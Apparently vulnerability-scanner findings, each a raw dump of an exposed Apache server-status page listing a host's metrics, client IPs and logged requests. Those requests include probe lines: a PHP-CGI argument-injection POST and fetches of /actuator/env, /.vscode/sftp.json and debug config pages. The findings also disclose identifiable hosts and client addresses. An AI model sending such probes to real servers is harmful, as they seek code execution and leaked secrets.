9.165160730190.00.27373.90 139.59
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb3136100b2736100b275299f0b4
Apache Status Apache Server Status for www.pre.relehse.com (via 103.23.61.80) Server Version: Apache/2.4.37 (rocky) OpenSSL/1.1.1k Server MPM: event Server Built: Apr 6 2023 16:38:06 Current Time: Sunday, 28-Sep-2025 14:49:04 CEST Restart Time: Friday, 12-Sep-2025 13:21:02 CEST Parent Server Config. Generation: 91 Parent Server MPM Generation: 90 Server uptime: 16 days 1 hour 28 minutes 1 second Server load: 0.55 0.61 0.67 Total accesses: 515327 - Total Traffic: 16.0 GB - Total Duration: 205201070 CPU Usage: u48.08 s55.6 cu2685.92 cs1480.36 - .308% CPU load .371 requests/sec - 12.1 kB/second - 32.6 kB/request - 398.196 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 03401810no0yes010000 13401811no0yes19000 23401809no0yes010000 33401942no0yes010000 43401812no0yes010000 Sum500 149000 ________________W_________________________________ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-9034018100/7/10723_ 2.3138940646000680.00.61320.53 178.22.31.192http/1.1done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-9034018100/5/10585_ 3.49407258452130.00.01312.88 162.158.122.38h2lcftech.es:443idle, streams: 0/2/2/0/0 (open/recv/resp/push/rst) 0-9034018100/7/11087_ 2.79403043750560.00.03416.05 172.68.134.145h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-9034018100/2/10758_ 2.30408038184030.00.01316.92 172.71.203.63h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-9034018100/6/10938_ 3.49408239413220.00.03331.75 162.158.122.38h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-9034018100/4/11191_ 2.301535053365480.00.00409.81 172.70.230.247h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-9034018100/6/11085_ 3.4939452049113010.00.08278.16 104.23.221.53h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-9034018100/1/10791_ 0.021535036782340.00.00310.74 64.226.65.160http/1.1cinre.tandemhse.com:80done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-9034018100/6/10943_ 3.123891748501260.00.82316.72 152.53.239.248http/1.1relehse.com:443GET /login HTTP/1.1 0-9034018100/6/10627_ 2.95403049596280.00.38353.19 162.158.123.103h2tandemsl.com:443done, streams: 0/2/2/0/0 (open/recv/resp/push/rst) 1-9034018110/60/11914_ 5.4011428882940.00.74308.01 139.59.143.102http/1.1 1-9034018110/62/12423_ 5.540035523710.00.53417.77 152.53.239.248http/1.1relehse.com:443GET /login HTTP/1.1 1-9034018110/60/12054_ 5.5311735225430.00.64308.28 139.59.143.102h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 1-9034018110/58/11903_ 5.540031520560.01.08330.48 152.53.239.248http/1.1cinre.tandemhse.com:443GET / HTTP/1.1 1-9034018110/57/12365_ 5.46139529205690.00.84328.03 139.59.143.102h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 1-9034018110/57/12935_ 5.560032143950.00.38407.17 139.59.143.102http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /@vite/env HTTP/1.1 1-9034018110/53/12464W 5.500051911490.01.84409.37 139.59.143.102http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server-status HTTP/1.1 1-9034018110/58/12906_ 5.560035969060.01.02389.01 139.59.143.102http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcPOST /php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3D0+%ADd+disa 1-9034018110/51/11456_ 5.560032695550.00.43315.56 139.59.143.102http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /about HTTP/1.1 1-9034018110/59/12405_ 5.4811724213360.00.97272.27 139.59.143.102http/1.1 2-9034018090/6/7601_ 2.621133584470.00.09226.39 139.59.143.102h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 2-9034018090/2/7212_ 0.9910112030493330.00.01264.41 152.53.239.248http/1.1relehse.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-9034018090/5/7632_ 2.62747025734430.00.26270.96 172.68.134.79h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-9034018090/5/7366_ 3.08101633649844870.00.01277.39 108.162.241.181h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-9034018090/4/7558_ 0.632520026094530.00.00346.63 172.64.238.13h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-9034018090/7/7401_ 2.3175222625246550.00.47266.03 172.69.109.50h2tandemsl.com:443idle, streams: 0/2/2/0/0 (open/recv/resp/push/rst) 2-9034018090/7/7718_ 2.201011032622760.00.20234.23 172.70.115.233h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-9034018090/7/7302_ 3.16752137291420.00.05243.41 172.69.11.150h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-9034018090/4/7519_ 2.3274738730643660.00.01246.88 172.69.109.50h2tandemsl.com:443idle, streams: 0/4/4/0/0 (open/recv/resp/push/rst) 2-9034018090/4/7546_ 1.6825201856017100.00.02270.85 152.53.239.248http/1.1relehse.com:443done, streams: 0/2/2/0/0 (open/recv/resp/push/rst) 3-9034019420/124/11810_ 8.731037707540.01.76378.75 139.59.143.102http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET / HTTP/1.1 3-9034019420/100/11489_ 8.66039638270000.00.95374.62 139.59.143.102h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 3-9034019420/110/12029_ 8.730035866750.03.75381.71 139.59.143.102http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /actuator/env HTTP/1.1 3-9034019420/117/11507_ 8.740039238920.01.86330.18 139.59.143.102http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 3-9034019420/136/11569_ 8.69136643192610.022.18389.35 172.71.124.87h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-9034019420/128/11769_ 8.730037342200.014.88378.77 139.59.143.102http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /debug/default/view?panel=config HTTP/1.1 3-9034019420/148/11723_ 8.730029519400.09.34403.15 139.59.143.102http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.vscode/sftp.json HTTP/1.1 3-9034019420/141/12021_ 8.720198026370.01.64327.32 139.59.143.102http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET / HTTP/1.1 3-9034019420/114/11468_ 8.730050903620.02.41367.43 139.59.143.102http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /v2/_catalog HTTP/1.1 3-9034019420/118/12502_ 8.730056138850.02.44372.88 139.59.143.102http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server HTTP/1.1 4-9034018120/2/9171_ 0.90166363066530.00.03331.39 139.59.143.102http/1.1 4-9034018120/6/8784_ 1.0539046058800.00.04305.78 152.53.239.248http/1.1cinre.tandemhse.com:443GET / HTTP/1.1 4-9034018120/7/9303_ 2.0539037748180.00.03331.77 152.53.239.248http/1.1cinre.tandemhse.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-9034018120/8/9462_ 3.227861042457110.00.56333.66 152.53.239.248http/1.1cinre-backend.tandemhse.com:443GET /server/health HTTP/1.1 4-9034018120/4/9132_ 2.26786035067090.00.27248.39 104.23.253.38h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-9034018120/7/8879_ 3.141046563510.00.03383.75 139.59.143.102h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 4-9034018120/8/9573_
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb3136100b2736100b2799ccf8a3
Apache Status Apache Server Status for www.pre.relehse.com (via 103.23.61.80) Server Version: Apache/2.4.37 (rocky) OpenSSL/1.1.1k Server MPM: event Server Built: Apr 6 2023 16:38:06 Current Time: Sunday, 28-Sep-2025 08:51:14 CEST Restart Time: Friday, 12-Sep-2025 13:21:02 CEST Parent Server Config. Generation: 86 Parent Server MPM Generation: 85 Server uptime: 15 days 19 hours 30 minutes 11 seconds Server load: 0.43 0.67 0.92 Total accesses: 511367 - Total Traffic: 15.9 GB - Total Duration: 204242791 CPU Usage: u66.62 s63.99 cu2638.93 cs1451.56 - .309% CPU load .374 requests/sec - 12.2 kB/second - 32.7 kB/request - 399.405 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 01404065no0yes010000 11404066no1yes010000 21404064no0yes010000 31404223no1yes19000 41404067no0yes010000 Sum502 149000 ______________________________W___________________ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-8514040650/12/10711_ 5.19137751145991800.00.04319.91 18.143.235.216http/1.1 0-8514040650/13/10576_ 5.20137743858446220.00.04312.86 18.143.235.216http/1.1 0-8514040650/19/11075_ 5.8813772343746340.00.20416.01 152.53.239.248http/1.1relehse.com:443GET /login HTTP/1.1 0-8514040650/14/10751_ 4.00953038173610.00.04316.86 172.70.224.174h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-8514040650/16/10929_ 4.91697039412870.00.04331.71 172.70.46.123h2lcftech.es:443done, streams: 0/2/2/0/0 (open/recv/resp/push/rst) 0-8514040650/20/11185_ 6.05702053365060.00.18409.77 172.64.236.150h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-8514040650/15/11075_ 5.326976449090550.00.12278.07 172.71.95.65h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-8514040650/16/10785_ 5.86953036768630.00.11310.73 172.71.241.21h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-8514040650/19/10931_ 5.97953048491210.00.14315.87 152.53.239.248http/1.1cinre.tandemhse.com:443GET / HTTP/1.1 0-8514040650/25/10616_ 5.3270213949595700.00.22352.48 172.71.95.65h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-8514040660/235/11811_ 17.531028701270.02.32307.03 167.172.232.142http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server HTTP/1.1 1-8514040660/218/12320_ 17.28311035308850.010.07416.91 152.53.239.248http/1.1cinre-backend.tandemhse.com:443done, streams: 0/2/2/0/0 (open/recv/resp/push/rst) 1-8514040660/231/11943_ 17.523017334982190.02.89306.99 172.70.193.199h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-8514040660/234/11809_ 17.48382031273760.010.45328.99 172.64.236.5h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-8514040660/218/12253_ 17.2625028821660.02.21326.75 172.68.27.167h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-8514040660/219/12823_ 17.51381431920440.02.21405.92 152.53.239.248http/1.1cinre-backend.tandemhse.com:443GET /server/health HTTP/1.1 1-8514040660/223/12360_ 17.5025051640630.02.91406.92 37.60.141.158http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /cgi-bin/luci/;stok=/locale HTTP/1.1 1-8514040660/217/12802_ 17.42301235759750.016.14387.68 152.53.239.248http/1.1cinre-backend.tandemhse.com:443GET /server/health HTTP/1.1 1-8514040660/221/11353_ 17.2138032399470.09.86314.52 115.231.78.8h2done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-8514040660/230/12302_ 17.5231123971740.015.05270.98 185.244.104.2http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcPROPFIND / HTTP/1.1 2-8514040640/35/7590_ 6.58471033581010.00.27225.41 172.70.207.97h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-8514040640/23/7205_ 6.28468030485850.00.11264.36 152.53.239.248http/1.1cinre.tandemhse.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-8514040640/24/7623_ 6.58473125732680.00.10270.68 172.64.238.167h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-8514040640/28/7356_ 6.594721849837220.00.19277.32 152.53.239.248http/1.1relehse.com:443GET /login HTTP/1.1 2-8514040640/27/7550_ 6.732026084620.00.18346.61 167.172.232.142http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /actuator/env HTTP/1.1 2-8514040640/20/7391_ 6.30473025240800.00.25265.54 172.70.85.196h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-8514040640/25/7708_ 5.6447151832615750.00.21233.80 18.143.235.216http/1.1done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-8514040640/20/7290_ 5.16472037278940.00.09243.32 18.143.235.216http/1.1done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-8514040640/27/7511_ 6.30472030626370.00.31246.64 172.70.162.107h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-8514040640/30/7538_ 6.51468056016730.00.15270.62 172.64.236.220h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-8514042230/232/11541W 15.710036833340.02.84375.80 167.172.232.142http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server-status HTTP/1.1 3-8514042230/239/11256_ 15.800037633330.02.64372.27 167.172.232.142http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /debug/default/view?panel=config HTTP/1.1 3-8514042230/213/11796_ 15.662835218670.02.08376.18 167.172.232.142http/1.1 3-8514042230/224/11247_ 15.68065738534870.09.03327.55 167.172.232.142http/1.1 3-8514042230/212/11281_ 15.7421442513380.08.73366.19 167.172.232.142h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 3-8514042230/231/11487_ 15.792036578390.017.39362.65 167.172.232.142http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcPOST /php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3D0+%ADd+disa 3-8514042230/237/11440_ 15.791028852290.03.94392.47 167.172.232.142http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /about HTTP/1.1 3-8514042230/207/11752_ 15.790097471070.02.56324.71 167.172.232.142http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET / HTTP/1.1 3-8514042230/253/11227_ 15.800050315140.04.50363.87 167.172.232.142http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /v2/_catalog HTTP/1.1 3-8514042230/237/12250_ 15.792055527490.02.84369.59 167.172.232.142http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /@vite/env HTTP/1.1 4-8514040670/23/9161_ 6.451063022400.00.11331.33 167.172.232.142http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.vscode/sftp.json HTTP/1.1 4-8514040670/27/8773_ 5.3011145346052010.00.32305.71 172.69.132.180h2tandemsl.com:443done, streams: 0/2/2/0/0 (open/recv/resp/push/rst) 4-8514040670/25/9291_ 6.450037737280.00.11331.65 167.172.232.142http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 4-8514040670/27/9444_ 6.0747759742412710.00.16333.04 172.71.222.99h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-8514040670/28/9124_ 5.90478135056560.00.45248.09 162.158.123.3h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-8514040670/22/8870_ 5.954046562920.00.08383.71 167.172.232.142http/1.1 4-8514040670/28/9
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb3136100b2736100b271641e69e
Apache Status Apache Server Status for www.pre.relehse.com (via 103.23.61.80) Server Version: Apache/2.4.37 (rocky) OpenSSL/1.1.1k Server MPM: event Server Built: Apr 6 2023 16:38:06 Current Time: Friday, 26-Sep-2025 21:04:41 CEST Restart Time: Friday, 12-Sep-2025 13:21:02 CEST Parent Server Config. Generation: 77 Parent Server MPM Generation: 76 Server uptime: 14 days 7 hours 43 minutes 38 seconds Server load: 0.71 0.65 0.63 Total accesses: 481564 - Total Traffic: 14.9 GB - Total Duration: 191283818 CPU Usage: u171.95 s117.43 cu2321.67 cs1273.37 - .314% CPU load .389 requests/sec - 12.6 kB/second - 32.4 kB/request - 397.214 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 03310262no0yes19000 13310263no0yes010000 23310261no0yes010000 33310264no0yes010000 43310397no0yes010000 Sum500 149000 __W_______________________________________________ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-7633102620/662/10059_ 53.9012044156850.015.15280.26 64.226.65.160h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 0-7633102620/707/9966_ 53.6911056004590.027.71294.81 64.226.65.160http/1.1 0-7633102620/713/10423W 53.950041859110.021.04392.00 64.226.65.160http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server-status HTTP/1.1 0-7633102620/720/10099_ 54.054036168900.012.65300.53 64.226.65.160http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /actuator/env HTTP/1.1 0-7633102620/701/10276_ 54.053037486400.012.28314.46 64.226.65.160http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server HTTP/1.1 0-7633102620/649/10517_ 54.053051421920.030.78387.07 64.226.65.160http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcPOST /php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3D0+%ADd+disa 0-7633102620/698/10358_ 54.062046899950.010.64239.28 64.226.65.160http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /about HTTP/1.1 0-7633102620/710/10110_ 54.040234780990.016.22303.27 64.226.65.160http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET / HTTP/1.1 0-7633102620/730/10286_ 53.8511646566750.014.65300.27 152.53.239.248http/1.1cinre-backend.tandemhse.com:443GET /server/health HTTP/1.1 0-7633102620/632/9950_ 53.76354747738380.016.96335.27 172.71.222.99h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-7633102630/55/11172_ 24.95475026806750.01.23284.91 172.70.94.41h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-7633102630/68/11672_ 25.04927033349640.010.22374.83 152.53.239.248http/1.1relehse.com:443GET /login HTTP/1.1 1-7633102630/59/11294_ 25.01470025981300.00.69298.14 198.41.227.114h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-7633102630/68/11172_ 24.95982028789470.04.30303.06 172.71.170.213h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-7633102630/62/11646_ 25.079272025894240.01.43304.09 152.53.239.248http/1.1relehse.com:443GET /login HTTP/1.1 1-7633102630/73/12200_ 25.21475030031850.00.96390.49 172.70.248.148h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-7633102630/78/11733_ 25.01987047306840.08.85394.10 198.41.227.44h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-7633102630/61/12165_ 25.01982024158260.01.21365.04 172.69.65.29h2lcftech.es:443done, streams: 0/1/1/0/1 (open/recv/resp/push/rst) 1-7633102630/69/10727_ 24.97927029975770.01.87291.21 172.68.27.200h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-7633102630/77/11675_ 25.0547052322311420.03.62249.78 172.69.17.163h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-7633102610/484/7488_ 39.59449033407950.07.70201.62 172.71.175.64h2lcftech.es:443done, streams: 0/2/2/0/0 (open/recv/resp/push/rst) 2-7633102610/472/7119_ 39.83454130364380.07.43263.18 172.71.164.85h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-7633102610/458/7537_ 39.64449025498880.06.27269.32 198.41.227.84h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-7633102610/438/7270_ 39.641059049629360.09.22275.74 172.69.65.62h2lcftech.es:443idle, streams: 0/2/2/0/0 (open/recv/resp/push/rst) 2-7633102610/441/7458_ 39.641059025876770.019.99334.67 172.68.27.41h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-7633102610/451/7312_ 39.591060024941790.07.12264.83 172.70.94.63h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-7633102610/446/7625_ 39.641060032111980.08.89232.66 172.69.65.62h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-7633102610/473/7215_ 39.64454337046240.029.61242.55 198.41.227.81h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-7633102610/470/7435_ 39.591060030476140.08.03245.27 172.71.170.216h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-7633102610/493/7435_ 39.591060055550400.08.06269.25 172.71.174.155h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-7633102640/314/10756_ 36.353034418940.07.44352.28 64.226.65.160http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.vscode/sftp.json HTTP/1.1 3-7633102640/337/10499_ 36.354034307460.07.56344.13 64.226.65.160http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /@vite/env HTTP/1.1 3-7633102640/329/11031_ 36.29458232191480.04.79333.57 64.226.65.160h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 3-7633102640/341/10421_ 36.31548035697910.04.54305.83 172.69.9.112h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-7633102640/332/10529_ 36.2112038240770.06.94346.91 64.226.65.160http/1.1 3-7633102640/329/10713_ 36.3012528779730.05.93328.45 64.226.65.160h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 3-7633102640/341/10675_ 36.351025045400.05.71376.29 64.226.65.160http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /v2/_catalog HTTP/1.1 3-7633102640/335/10999_ 36.350293602130.08.01312.80 64.226.65.160http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET / HTTP/1.1 3-7633102640/317/10361_ 36.350039030280.015.59328.38 64.226.65.160http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 3-7633102640/307/11467_ 36.351051313660.04.53356.29 64.226.65.160http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /debug/default/view?panel=config HTTP/1.1 4-7633103970/865/8362_ 62.5534830961158420.020.77312.16 162.158.119.211h2tandemsl.com:443idle, streams: 0/12/12/0/0 (open/recv/resp/push/rst) 4-7633103970/911/7943_ 62.602641644064210.015.10273.56 152.53.239.248http/1.1relehse.com:443GET /login HTTP/1.1 4-7633103970/875/8451_ 62.5526428735523360.013.94272.57 162.158.119.211h2tandemsl.com:443idle, streams: 0/14/14/0/0 (open/recv/resp/push/rst) 4-7633103970/852/8619_ 62.5635532540344170.048.68315.61 162.158.119.211h2tandemsl.com:443idle, streams: 0/17/17/0/0 (open/recv/resp/push/rst) 4-7633103970/866/8332_ 62.5526426833106070.021.10230.62 162.158.119.211h2tandemsl.com:443idle, streams: 0/15/15/0/0 (open/recv/resp/push/rst) 4-7633103970/923/8047_ 62.5735328144607130.043.06334.81 162.158.119.211h2
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb3136100b2736100b276762855f
Apache Status Apache Server Status for www.pre.relehse.com (via 103.23.61.80) Server Version: Apache/2.4.37 (rocky) OpenSSL/1.1.1k Server MPM: event Server Built: Apr 6 2023 16:38:06 Current Time: Friday, 26-Sep-2025 16:16:14 CEST Restart Time: Friday, 12-Sep-2025 13:21:02 CEST Parent Server Config. Generation: 77 Parent Server MPM Generation: 76 Server uptime: 14 days 2 hours 55 minutes 11 seconds Server load: 0.34 0.51 0.58 Total accesses: 476326 - Total Traffic: 14.8 GB - Total Duration: 189563999 CPU Usage: u139.86 s98.86 cu2321.67 cs1273.37 - .314% CPU load .39 requests/sec - 12.7 kB/second - 32.6 kB/request - 397.971 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 03310262no0yes19000 13310263no0yes010000 23310261no0yes010000 33310264no0yes010000 43310397no0yes010000 Sum500 149000 ___W______________________________________________ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-7633102620/467/9864_ 40.380043552210.012.67277.78 167.71.175.236http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 0-7633102620/533/9792_ 40.381055320060.026.62293.73 167.71.175.236http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.vscode/sftp.json HTTP/1.1 0-7633102620/507/10217_ 40.25068641290830.018.43389.39 167.71.175.236http/1.1 0-7633102620/531/9910W 40.320035560260.011.22299.09 167.71.175.236http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server-status HTTP/1.1 0-7633102620/506/10081_ 40.380036917140.010.13312.30 167.71.175.236http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /debug/default/view?panel=config HTTP/1.1 0-7633102620/453/10321_ 40.381050724890.027.38383.67 167.71.175.236http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /about HTTP/1.1 0-7633102620/513/10173_ 40.3301346317570.07.62236.26 167.71.175.236h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 0-7633102620/536/9936_ 40.352934376050.014.46301.51 167.71.175.236http/1.1 0-7633102620/541/10097_ 40.382046003680.013.29298.91 167.71.175.236http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcPOST /php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3D0+%ADd+disa 0-7633102620/462/9780_ 40.380047195840.015.01333.31 167.71.175.236http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /v2/_catalog HTTP/1.1 1-7633102630/44/11161_ 19.15297226805820.00.96284.64 172.68.230.152h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-7633102630/60/11664_ 19.332861733342070.010.08374.69 90.161.226.45h2relehse.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-7633102630/48/11283_ 19.25286025980220.00.62298.07 152.53.239.248http/1.1relehse.com:443done, streams: 0/2/2/0/0 (open/recv/resp/push/rst) 1-7633102630/58/11162_ 19.362911828789320.04.27303.03 162.158.123.73h2tandemsl.com:443idle, streams: 0/2/2/0/0 (open/recv/resp/push/rst) 1-7633102630/51/11635_ 19.3629223925891750.01.28303.93 162.158.123.73h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-7633102630/55/12182_ 19.2922643230000390.00.80390.33 172.68.164.4h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-7633102630/64/11719_ 19.382311547283480.08.74393.99 172.68.134.121h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-7633102630/51/12155_ 19.24297024144170.01.09364.92 209.97.180.8http/1.1relehse.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-7633102630/57/10715_ 19.35297029967600.01.82291.17 152.53.239.248http/1.1cinre.tandemhse.com:443GET / HTTP/1.1 1-7633102630/61/11659_ 19.11226022268790.03.42249.58 172.68.150.116h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-7633102610/453/7457_ 33.29265533354500.07.50201.41 217.160.163.127h2barrerasdecontencion.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-7633102610/434/7081_ 33.3081030260320.07.22262.96 152.53.239.248http/1.1relehse.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-7633102610/424/7503_ 33.3526025441410.05.97269.02 152.53.239.248http/1.1relehse.com:443GET /login HTTP/1.1 2-7633102610/409/7241_ 33.14217849579870.08.72275.24 